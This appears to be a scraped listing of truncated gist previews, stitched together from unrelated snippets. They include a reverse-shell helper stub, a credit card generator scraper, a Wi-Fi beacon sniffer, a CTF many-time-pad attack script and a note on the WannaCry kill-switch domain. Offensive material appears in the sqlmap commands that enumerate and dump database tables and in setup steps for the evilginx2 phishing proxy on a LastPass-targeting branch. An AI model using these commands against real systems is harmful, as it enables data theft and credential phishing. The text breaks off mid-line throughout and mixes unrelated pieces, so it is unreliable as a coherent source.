- Create msf rc file for standard msfvenom binaries
function revshell() {
# $1 language
# Default tun0 1337
INF=tun0
PORT=1337
#### Credit Card Generator | |
#### Made By Random_Robbie | |
#### | |
#### For testing Websites the data here is scraped from a website and the numbers and details are randomly generated no data is real!! | |
#### | |
import requests | |
import re | |
### Grab Data from http://credit-card-generator.2-ee.com/ | |
session = requests.Session() |
function revshell() {
# $1 language
# Default tun0 1337
INF=tun0
PORT=1337
#!/usr/bin/env python3 | |
# -*- encoding: utf-8 -*- | |
import multiprocessing as mp | |
import os | |
import subprocess | |
import time | |
import sys | |
try: | |
import click | |
from colored import fg, stylize |
#!/usr/bin/env python | |
from scapy.all import * | |
ap_list = [] | |
def PacketHandler(pkt) : | |
if pkt.haslayer(Dot11) : | |
if pkt.type == 0 and pkt.subtype == 8 : |
javascript:document.getElementById("video").defaultPlaybackRate = prompt("Enter your prefered playback rate:");document.getElementById("video").load(); |
# Install go first | |
export GOPATH=$HOME/go | |
export PATH=$PATH:/usr/local/go/bin:$GOPATH/bin | |
sudo apt-get install git make | |
go get -u github.com/kgretzky/evilginx2 | |
cd $GOPATH/src/github.com/kgretzky/evilginx2 | |
git remote add pberba https://github.com/pberba/evilginx2.git | |
git fetch pberba | |
git checkout -b lastpass pberba/feature/lastpass |
#!/usr/bin/python | |
## OTP - Recovering the private key from a set of messages that were encrypted w/ the same private key (Many time pad attack) - crypto100-many_time_secret @ alexctf 2017 | |
# @author intrd - http://dann.com.br/ | |
# Original code by jwomers: https://github.com/Jwomers/many-time-pad-attack/blob/master/attack.py) | |
import string | |
import collections | |
import sets, sys | |
# 11 unknown ciphertexts (in hex format), all encrpyted with the same key |
# Enumerate databases
sqlmap --dbms=mysql -u "$URL" --dbs
# Enumerate tables
sqlmap --dbms=mysql -u "$URL" -D "$DATABASE" --tables
# Dump table data
sqlmap --dbms=mysql -u "$URL" -D "$DATABASE" -T "$TABLE" --dump
www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com
is up the virus exits instead of infecting the host. (source: malwarebytes). This domain has been sinkholed, stopping the spread of the worm. Will not work if proxied (source).update: A minor variant of the viru